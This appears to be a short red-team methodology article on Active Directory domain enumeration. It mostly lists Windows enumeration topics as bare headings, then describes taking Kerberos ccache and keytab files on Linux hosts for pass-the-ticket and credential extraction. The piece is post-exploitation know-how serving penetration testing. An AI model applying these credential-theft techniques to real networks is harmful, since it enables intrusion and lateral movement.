[Backup] Domain Enumeration Methodology

Hey folks, today I start a new series of articles to discuss Active Directory Exploitation. This is the first article, we focus on domain enumeration. We assume you have already had an initial shell on a domain computer, no matter it is Windows domain computer or Linux domain computer, because we will discuss both of them : D

Be aware that it is not an article which focuses on the detailed usage of tool and command, we focus on methodology.

Enumeration on Windows

0: One-Click Vulnerabilities

1: Domain User

2: Domain Group

3: Foreign Members

4: Domain Computer

5: Existing Sessions and Processes

After getting SYSTEM privilege, we can impersonate any logged domain users. If impersonated user has specific rights, we could move to other machines even domains.

6: Owned Users’ Permission

7: Service Access

8: GPO

9: Delegation

10: ADCS

11: Trust

Enumeration on Linux

As A Normal User

As A Privileged User

ccache files hold the Kerberos credentials for a user authenticated to a linux domain computer. If there is any active domain user session, we can see ccache files in /tmp, the file is in the form of krb5cc_xxxxx. We can pass ccache file directly on Linux machine, or use impacket to convert it to .kirbi form and pass it to current session on a Windows machine.

keytab file contains mappings between Kerberos Principal names and DES-encrypted keys that are derived from the password used to log into the Kerberos Key Distribution Center (KDC). We can use a script (https://github.com/sosdave/KeyTabExtract)to retrieve credentials from it. Each linux domain computer has its keytab file at /etc/krb5.keytab, it is accessible for root by default.


Revision #1
Created 28 February 2024 18:22:59 by winslow
Updated 28 February 2024 19:38:59 by winslow